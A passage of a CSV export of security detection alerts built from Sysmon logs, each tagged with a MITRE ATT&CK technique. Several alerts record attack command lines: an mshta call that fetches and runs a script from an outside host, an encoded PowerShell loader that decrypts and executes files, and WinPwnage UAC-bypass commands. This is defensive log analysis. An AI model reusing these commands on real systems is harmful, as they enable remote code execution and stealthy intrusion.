FIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16388 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.213 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1FF8-5CD8-0000-00102A342000 + 1332 + C:\Python27\python.exe + python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.837 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10920364 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-10-21 16:27:02.278 + 00247C92-94D6-6171-0000-00100514967B + 28176 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe + cscript.exe //e:jscript testme.js + C:\Users\bouss\Desktop\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3C1A-6169-0000-0020C2790700 + 0x779c2 + 1 + Medium + SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 00247C92-85C9-6170-0000-001008E62B6B + 24148 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5931 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.622 + 365ABB72-3D6E-5CEB-0000-0010EF9EFF00 + 3756 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164913 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 22:28:20.529 + 00247C92-9E04-5F7B-0000-0010CF98272C + 12876 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-9E03-5F7B-0000-0010A645272C + 20228 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" WF.msc + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6177 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.437 + 365ABB72-FE6D-5CEB-0000-0010122D0C00 + 1636 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 